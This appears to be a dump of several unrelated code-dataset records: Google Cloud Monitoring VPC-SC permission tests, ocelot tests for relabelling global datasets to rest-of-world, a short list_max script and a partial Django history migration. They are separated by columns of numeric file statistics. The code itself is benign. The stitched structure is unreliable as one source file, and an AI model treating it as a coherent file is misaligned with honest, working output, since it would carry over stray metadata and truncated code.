            ncs_client.get_notification_channel(
                request={"name": notification_channel_path_inside}
            )

    @staticmethod
    def test_get_notification_channel_outside(
        ncs_client, notification_channel_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.get_notification_channel(
                request={"name": notification_channel_path_outside}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_get_notification_channel_verification_code_inside(
        ncs_client, notification_channel_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ncs_client.get_notification_channel_verification_code(
                request={"name": notification_channel_path_inside}
            )

    @staticmethod
    def test_get_notification_channel_verification_code_outside(
        ncs_client, notification_channel_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.get_notification_channel_verification_code(
                request={"name": notification_channel_path_outside}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_send_notification_channel_verification_code_inside(
        ncs_client, notification_channel_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ncs_client.send_notification_channel_verification_code(
                request={"name": notification_channel_path_inside}
            )

    @staticmethod
    def test_send_notification_channel_verification_code_outside(
        ncs_client, notification_channel_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.send_notification_channel_verification_code(
                request={"name": notification_channel_path_outside}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_verify_notification_channel_inside(
        ncs_client, notification_channel_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ncs_client.verify_notification_channel(
                request={"name": notification_channel_path_inside, "code": ""}
            )

    @staticmethod
    def test_verify_notification_channel_outside(
        ncs_client, notification_channel_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.verify_notification_channel(
                request={"name": notification_channel_path_outside, "code": ""}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_update_notification_channel_inside(
        ncs_client, notification_channel_path_inside
    ):
        with pytest.raises(exceptions.InvalidArgument):  # no perms issue
            ncs_client.update_notification_channel(
                request={
                    "notification_channel": {"name": notification_channel_path_inside}
                }
            )

    @staticmethod
    def test_update_notification_channel_outside(
        ncs_client, notification_channel_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.update_notification_channel(
                request={
                    "notification_channel": {"name": notification_channel_path_outside}
                }
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_delete_notification_channel_inside(
        ncs_client, notification_channel_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ncs_client.delete_notification_channel(
                request={"name": notification_channel_path_inside}
            )

    @staticmethod
    def test_delete_notification_channel_outside(
        ncs_client, notification_channel_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.delete_notification_channel(
                request={"name": notification_channel_path_outside}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_list_notification_channel_descriptors_inside(ncs_client, name_inside):
        list(
            ncs_client.list_notification_channel_descriptors(
                request={"name": name_inside}
            )
        )

    @staticmethod
    def test_list_notification_channel_descriptors_outside(ncs_client, name_outside):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            list(
                ncs_client.list_notification_channel_descriptors(
                    request={"name": name_outside}
                )
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_get_notification_channel_descriptor_inside(
        ncs_client, notification_channel_descriptor_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ncs_client.get_notification_channel_descriptor(
                request={"name": notification_channel_descriptor_path_inside}
            )

    @staticmethod
    def test_get_notification_channel_descriptor_outside(
        ncs_client, notification_channel_descriptor_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ncs_client.get_notification_channel_descriptor(
                request={"name": notification_channel_descriptor_path_outside}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
@pytest.fixture(scope="module")
def ucc_client():
    """Module-scoped UptimeCheckServiceClient shared by the tests below."""
    return monitoring_v3.UptimeCheckServiceClient()


@pytest.fixture(scope="module")
def uptime_check_config_path_inside(ucc_client):
    """Path to a mock uptime check config in the in-perimeter project."""
    # Fixed copy-paste: the id was "mock_notification_channel", carried over
    # from the notification channel fixtures. Tests only need a syntactically
    # valid, nonexistent id, so the rename does not change any outcome.
    uptime_check_config_id = "mock_uptime_check_config"
    return ucc_client.uptime_check_config_path(
        vpcsc_config.project_inside, uptime_check_config_id
    )


@pytest.fixture(scope="module")
def uptime_check_config_path_outside(ucc_client):
    """Path to a mock uptime check config in the out-of-perimeter project."""
    uptime_check_config_id = "mock_uptime_check_config"
    return ucc_client.uptime_check_config_path(
        vpcsc_config.project_outside, uptime_check_config_id
    )
@vpcsc_config.skip_unless_inside_vpcsc
class TestCRUDUptimeCheckConfigs(object):
    """VPC-SC checks for uptime check config RPCs.

    In-perimeter calls fail with NotFound/InvalidArgument (mock data),
    showing the perimeter admitted them; out-of-perimeter calls fail with
    PermissionDenied carrying the VPC-SC prohibition message.
    """

    @staticmethod
    def test_create_uptime_check_config_inside(ucc_client, name_inside):
        with pytest.raises(exceptions.InvalidArgument):  # no perms issue
            ucc_client.create_uptime_check_config(
                request={"parent": name_inside, "uptime_check_config": {}}
            )

    @staticmethod
    def test_create_uptime_check_config_outside(ucc_client, name_outside):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ucc_client.create_uptime_check_config(
                request={"parent": name_outside, "uptime_check_config": {}}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_list_uptime_check_configs_inside(ucc_client, name_inside):
        # list(...) forces the pager to issue the RPC.
        list(ucc_client.list_uptime_check_configs(request={"parent": name_inside}))

    @staticmethod
    def test_list_uptime_check_configs_outside(ucc_client, name_outside):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            list(ucc_client.list_uptime_check_configs(request={"parent": name_outside}))
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_get_uptime_check_config_inside(
        ucc_client, uptime_check_config_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ucc_client.get_uptime_check_config(
                request={"name": uptime_check_config_path_inside}
            )

    @staticmethod
    def test_get_uptime_check_config_outside(
        ucc_client, uptime_check_config_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ucc_client.get_uptime_check_config(
                request={"name": uptime_check_config_path_outside}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_update_uptime_check_config_inside(
        ucc_client, uptime_check_config_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ucc_client.update_uptime_check_config(
                request={
                    "uptime_check_config": {"name": uptime_check_config_path_inside}
                }
            )

    @staticmethod
    def test_update_uptime_check_config_outside(
        ucc_client, uptime_check_config_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ucc_client.update_uptime_check_config(
                request={
                    "uptime_check_config": {"name": uptime_check_config_path_outside}
                }
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message

    @staticmethod
    def test_delete_uptime_check_config_inside(
        ucc_client, uptime_check_config_path_inside
    ):
        with pytest.raises(exceptions.NotFound):  # no perms issue
            ucc_client.delete_uptime_check_config(
                request={"name": uptime_check_config_path_inside}
            )

    @staticmethod
    def test_delete_uptime_check_config_outside(
        ucc_client, uptime_check_config_path_outside
    ):
        with pytest.raises(exceptions.PermissionDenied) as exc:
            ucc_client.delete_uptime_check_config(
                request={"name": uptime_check_config_path_outside}
            )
        assert _VPCSC_PROHIBITED_MESSAGE in exc.value.message
| 36.819629
| 88
| 0.712773
| 3,095
| 27,762
| 5.979321
| 0.057512
| 0.092402
| 0.069815
| 0.085702
| 0.920134
| 0.901437
| 0.858478
| 0.823895
| 0.762455
| 0.711283
| 0
| 0.001193
| 0.21515
| 27,762
| 753
| 89
| 36.868526
| 0.848134
| 0.038974
| 0
| 0.577855
| 1
| 0
| 0.044719
| 0.013555
| 0
| 0
| 0
| 0
| 0.058824
| 1
| 0.153979
| false
| 0
| 0.008651
| 0.012111
| 0.211073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2f413022b701412ef6519dbe2a76dc1bec15fa2
| 18,808
|
py
|
Python
|
tests/locations/rest_of_world.py
|
cmutel/Ocelot
|
20e9639570c43f84ae255750a6c402ebabe00981
|
[
"BSD-3-Clause"
] | 21
|
2016-06-01T14:10:07.000Z
|
2022-02-28T01:56:31.000Z
|
tests/locations/rest_of_world.py
|
cmutel/Ocelot
|
20e9639570c43f84ae255750a6c402ebabe00981
|
[
"BSD-3-Clause"
] | 152
|
2016-05-16T21:33:22.000Z
|
2019-06-24T12:57:14.000Z
|
tests/locations/rest_of_world.py
|
cmutel/Ocelot
|
20e9639570c43f84ae255750a6c402ebabe00981
|
[
"BSD-3-Clause"
] | 12
|
2016-09-05T15:35:59.000Z
|
2021-07-03T19:28:47.000Z
|
# -*- coding: utf-8 -*-
from ocelot.errors import MultipleGlobalDatasets
from ocelot.transformations.locations import (
drop_zero_pv_row_datasets,
relabel_global_to_row,
)
from copy import deepcopy
import pytest
def test_relabel_global_to_row():
    """GLO datasets that have same-named regional siblings are relabeled RoW."""
    given = [{
        'name': 'make something',
        'location': 'GLO',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'production volume': {'amount': 0},
            'amount': 1,
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }, {
        'name': 'make something else',
        'location': 'GLO',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }, {
        'name': 'make something else',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }]
    # NOTE(review): the last two expected exchanges say 'another product' while
    # `given` uses 'a product'; harmless here because hashify below compares
    # only (name, location) of the datasets, never the exchanges.
    expected = [{
        'name': 'make something',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }, {
        'name': 'make something else',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'another product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }, {
        'name': 'make something else',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'another product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }]
    # Can't directly compare dictionaries if order has changed
    hashify = lambda x: {(y['name'], y['location']) for y in x}
    assert hashify(relabel_global_to_row(given)) == hashify(expected)
def test_relabel_global_to_row_dropped_products():
    """Relabeling does NOT proceed when the GLO dataset carries a nonzero byproduct.

    The final assertion is deliberately ``!=``: the (name, location) set
    produced by relabel_global_to_row differs from the RoW-relabeled
    ``expected`` — presumably because the allocatable byproduct with
    amount 1 blocks the GLO→RoW relabel (TODO confirm against
    relabel_global_to_row's implementation).
    """
    given = [{
        'name': 'make something',
        'location': 'GLO',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'production volume': {'amount': 0},
            'amount': 1,
        }, {
            # Byproduct with nonzero amount (contrast with the
            # ..._ignore_zero_dropped_products test, where it is 0).
            'name': 'another product',
            'unit': '',
            'type': 'byproduct',
            'byproduct classification': 'allocatable product',
            'production volume': {'amount': 0},
            'amount': 1,
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }]
    expected = [{
        'name': 'make something',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }, {
            'name': 'another product',
            'unit': '',
            'type': 'byproduct',
            'byproduct classification': 'allocatable product',
            'production volume': {'amount': 0},
            'amount': 0,
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }]
    # Can't directly compare dictionaries if order has changed
    hashify = lambda x: {(y['name'], y['location']) for y in x}
    assert hashify(relabel_global_to_row(given)) != hashify(expected)
def test_relabel_global_to_row_ignore_zero_dropped_products():
    """A zero-amount byproduct does not block the GLO→RoW relabel.

    Identical to ..._dropped_products above except the byproduct amount is 0,
    and the assertion is equality instead of inequality.
    """
    given = [{
        'name': 'make something',
        'location': 'GLO',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'production volume': {'amount': 0},
            'amount': 1,
        }, {
            'name': 'another product',
            'unit': '',
            'type': 'byproduct',
            'byproduct classification': 'allocatable product',
            'production volume': {'amount': 0},
            'amount': 0,
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }]
    expected = [{
        'name': 'make something',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }, {
            'name': 'another product',
            'unit': '',
            'type': 'byproduct',
            'byproduct classification': 'allocatable product',
            'production volume': {'amount': 0},
            'amount': 0,
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'unit': '',
            'type': 'reference product',
            'amount': 1,
            'production volume': {'amount': 0}
        }]
    }]
    # Can't directly compare dictionaries if order has changed
    hashify = lambda x: {(y['name'], y['location']) for y in x}
    assert hashify(relabel_global_to_row(given)) == hashify(expected)
def test_relabel_global_to_row_skip_market_groups():
    """Datasets of type 'market group' are returned untouched, GLO included."""
    reference_exchanges = [{
        'name': 'a product',
        'amount': 1,
        'type': 'reference product'
    }]
    given = [
        {
            'name': 'shellfish',
            'type': 'market group',
            'location': 'GLO',
            'exchanges': deepcopy(reference_exchanges),
        },
        {
            'name': 'shellfish',
            'type': 'market group',
            'location': 'CN',
            'exchanges': deepcopy(reference_exchanges),
        },
    ]
    # Snapshot the input before the call so mutation would be detected too.
    expected = deepcopy(given)
    assert relabel_global_to_row(given) == expected
def test_relabel_global_to_row_only_single_global():
    """A lone GLO dataset (no regional siblings) is returned unchanged."""
    dataset = {
        'name': 'make something',
        'type': 'market activity',
        'location': 'GLO',
        'exchanges': [
            {'name': 'a product', 'amount': 1, 'type': 'reference product'}
        ],
    }
    given = [dataset]
    expected = deepcopy(given)  # snapshot before the call
    assert relabel_global_to_row(given) == expected
def test_relabel_global_to_row_only_single_nonglobal():
    """A lone non-GLO dataset is returned unchanged."""
    dataset = {
        'name': 'make something',
        'type': 'market activity',
        'location': 'somewhere',
        'exchanges': [
            {'name': 'a product', 'amount': 1, 'type': 'reference product'}
        ],
    }
    given = [dataset]
    expected = deepcopy(given)  # snapshot before the call
    assert relabel_global_to_row(given) == expected
def test_multiple_global_datasets():
    """Two same-named GLO datasets are an error: MultipleGlobalDatasets."""
    global_dataset = {
        'name': 'make something',
        'type': 'market activity',
        'location': 'GLO',
        'exchanges': [
            {'name': 'a product', 'amount': 1, 'type': 'reference product'}
        ],
    }
    # Two independent but equal GLO copies of the same activity.
    given = [global_dataset, deepcopy(global_dataset)]
    with pytest.raises(MultipleGlobalDatasets):
        relabel_global_to_row(given)
def test_drop_zero_pv_row_datasets():
    """Only RoW *market activity* datasets whose reference product has zero
    production volume are dropped; other types, locations, or nonzero PVs
    pass through unchanged."""
    data = [
        {
            # Wrong type: not a market activity, so kept despite zero PV in RoW.
            'type': 'party activity',
            'location': 'RoW',
            'exchanges': [{
                'type': 'reference product',
                'production volume': {'amount': 0}
            }]
        },
        {
            # Nonzero PV: kept.
            'type': 'market activity',
            'location': 'RoW',
            'exchanges': [{
                'type': 'reference product',
                'production volume': {'amount': 10}
            }]
        },
        {
            # Wrong location: kept despite zero PV.
            'type': 'market activity',
            'location': 'Nowhere',
            'exchanges': [{
                'type': 'reference product',
                'production volume': {'amount': 0}
            }]
        },
        {
            # Market activity + RoW + zero PV: this one is dropped.
            'type': 'market activity',
            'name': 'foo',
            'location': 'RoW',
            'exchanges': [{
                'type': 'reference product',
                'production volume': {'amount': 0},
                'name': 'bar'
            }]
        },
    ]
    # Survivors are exactly the first three entries; snapshot them before
    # the call in case the function mutates its input.
    expected = deepcopy(data[:3])
    assert drop_zero_pv_row_datasets(data) == expected
def test_relabel_global_to_row_subtract_pv():
    """RoW production volume = global PV minus the regional siblings' PV.

    Expected amounts in the literals below: 100 - 10 = 90 for the first
    activity and 100 - 50 = 50 for the second.
    """
    given = [{
        'name': 'make something',
        'location': 'GLO',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 100
            }
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 10
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'GLO',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 100
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 50
            }
        }]
    }]
    expected = [{
        'name': 'make something',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 90
            }
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 10
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'another product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 50
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'another product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 50
            }
        }]
    }]
    # Can't directly compare dictionaries if order has changed
    hashify = lambda x: {(y['name'], y['location'], y['exchanges'][0]['production volume']['amount']) for y in x}
    assert hashify(relabel_global_to_row(given)) == hashify(expected)
def test_relabel_global_to_row_subtract_origianal_pv():
    """When a regional PV carries an 'original amount', that original amount
    (50 here, not the net 10) is subtracted from the global PV, and the RoW
    exchange records the pre-subtraction global PV as 'global amount'.

    NOTE(review): 'origianal' in the test name is a typo for 'original'; left
    as-is because pytest discovers tests by name.
    """
    given = [{
        'name': 'make something',
        'location': 'GLO',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 100
            }
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                # Net 10 after an activity-link subtraction of 40;
                # 'original amount' (50) is what RoW subtraction uses.
                'amount': 10,
                'subtracted activity link volume': 40,
                'original amount': 50
            }
        }]
    }]
    expected = {
        'name': 'make something',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 50,  # 100 (global) - 50 (regional original amount)
                'global amount': 100,
            }
        }]
    }
    assert next(o for o in relabel_global_to_row(given) if o['location'] == 'RoW') == expected
def test_relabel_global_to_row_subtract_pv_overspecified_regional_pv():
    """If regional PVs exceed the global PV (110 > 100, 150 > 100), the RoW
    production volume is floored at 0 rather than going negative."""
    given = [{
        'name': 'make something',
        'location': 'GLO',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 100
            }
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 110
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'GLO',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 100
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'somewhere else',
        'unit': '',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 150
            }
        }]
    }]
    expected = [{
        'name': 'make something',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 0
            }
        }]
    }, {
        'name': 'make something',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'a product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 110
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'RoW',
        'type': 'market activity',
        'exchanges': [{
            'name': 'another product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 0
            }
        }]
    }, {
        'name': 'make something else',
        'location': 'somewhere else',
        'type': 'market activity',
        'exchanges': [{
            'name': 'another product',
            'type': 'reference product',
            'unit': '',
            'amount': 1,
            'production volume': {
                'amount': 150
            }
        }]
    }]
    # Can't directly compare dictionaries if order has changed
    hashify = lambda x: {(y['name'], y['location'], y['exchanges'][0]['production volume']['amount']) for y in x}
    assert hashify(relabel_global_to_row(given)) == hashify(expected)
| 28.540212
| 113
| 0.430349
| 1,440
| 18,808
| 5.544444
| 0.069444
| 0.078156
| 0.12024
| 0.118362
| 0.948647
| 0.939755
| 0.922846
| 0.922595
| 0.915581
| 0.90506
| 0
| 0.011527
| 0.404987
| 18,808
| 658
| 114
| 28.583587
| 0.701903
| 0.01627
| 0
| 0.887147
| 0
| 0
| 0.350203
| 0
| 0
| 0
| 0
| 0
| 0.015674
| 1
| 0.017241
| false
| 0
| 0.00627
| 0
| 0.023511
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
390a9d1ad455ab629d400df635bac55e949a9b19
| 81
|
py
|
Python
|
College grade 2/Python 3/Lab_1/Sp/scrpits/3.py
|
SimonH19009/Lzu_Data-science
|
bd35c5e156b0db21c3585c11dce15fba0b7003e2
|
[
"MIT"
] | 1
|
2022-03-06T05:30:44.000Z
|
2022-03-06T05:30:44.000Z
|
College grade 2/Python 3/Lab_1/Sp/scrpits/3.py
|
SimonH19009/Lzu_Data-science
|
bd35c5e156b0db21c3585c11dce15fba0b7003e2
|
[
"MIT"
] | null | null | null |
College grade 2/Python 3/Lab_1/Sp/scrpits/3.py
|
SimonH19009/Lzu_Data-science
|
bd35c5e156b0db21c3585c11dce15fba0b7003e2
|
[
"MIT"
] | 1
|
2022-03-06T06:07:40.000Z
|
2022-03-06T06:07:40.000Z
|
def list_max(int_list):
    """Return the largest element of *int_list*."""
    return max(int_list)


print(list_max([1, 2, 8, 3, 10, 5]))
| 27
| 32
| 0.691358
| 18
| 81
| 2.888889
| 0.666667
| 0.269231
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097222
| 0.111111
| 81
| 3
| 32
| 27
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
394e9555540933c70f9f6e77bb7923c0d722d525
| 28,185
|
py
|
Python
|
mainapp/migrations/0006_historicalagendaitem_historicalbody_historicalconsultation_historicalfile_historicallegislativeterm_.py
|
stv0g/meine-stadt-transparent
|
059f7d25c5d11f476a8856928bed389f529f8546
|
[
"MIT"
] | 34
|
2017-10-04T14:20:41.000Z
|
2022-03-11T18:06:48.000Z
|
mainapp/migrations/0006_historicalagendaitem_historicalbody_historicalconsultation_historicalfile_historicallegislativeterm_.py
|
stv0g/meine-stadt-transparent
|
059f7d25c5d11f476a8856928bed389f529f8546
|
[
"MIT"
] | 588
|
2017-10-14T18:31:17.000Z
|
2022-03-16T13:00:30.000Z
|
mainapp/migrations/0006_historicalagendaitem_historicalbody_historicalconsultation_historicalfile_historicallegislativeterm_.py
|
stv0g/meine-stadt-transparent
|
059f7d25c5d11f476a8856928bed389f529f8546
|
[
"MIT"
] | 11
|
2017-11-27T10:12:59.000Z
|
2022-02-09T10:27:11.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-14 14:36
# NOTE(review): auto-generated migration (makemigrations) — do not hand-edit
# field definitions; create a follow-up migration for schema changes instead.
from __future__ import unicode_literals
import django.db.models.deletion
import djgeojson.fields
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the Historical* shadow tables for mainapp models.

    Each CreateModel below mirrors an existing mainapp model and adds the
    bookkeeping columns (history_id, history_date, history_change_reason,
    history_type, history_user) used for per-row change tracking.  The
    pattern matches django-simple-history's generated tables — presumably
    that app manages these models; verify against the project settings.
    """
    # Depends on the swappable user model (history_user FK target) and the
    # previous mainapp migration.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('mainapp', '0005_auto_20180112_1229'),
    ]
    # One CreateModel per tracked model.  FKs into mainapp use
    # db_constraint=False and on_delete=DO_NOTHING so history rows survive
    # deletion of the referenced live rows.
    operations = [
        migrations.CreateModel(
            name='HistoricalAgendaItem',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('key', models.CharField(blank=True, max_length=20, null=True)),
                ('title', models.TextField()),
                ('position', models.IntegerField()),
                ('public', models.NullBooleanField()),
                ('result', models.TextField(blank=True, null=True)),
                ('resolution_text', models.TextField(blank=True, null=True)),
                ('start', models.DateTimeField(blank=True, null=True)),
                ('end', models.DateTimeField(blank=True, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('consultation', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                   on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                                   to='mainapp.Consultation')),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('meeting', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                              on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                              to='mainapp.Meeting')),
                ('resolution_file', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                      on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                                      to='mainapp.File')),
            ],
            options={
                'verbose_name': 'historical agenda item',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
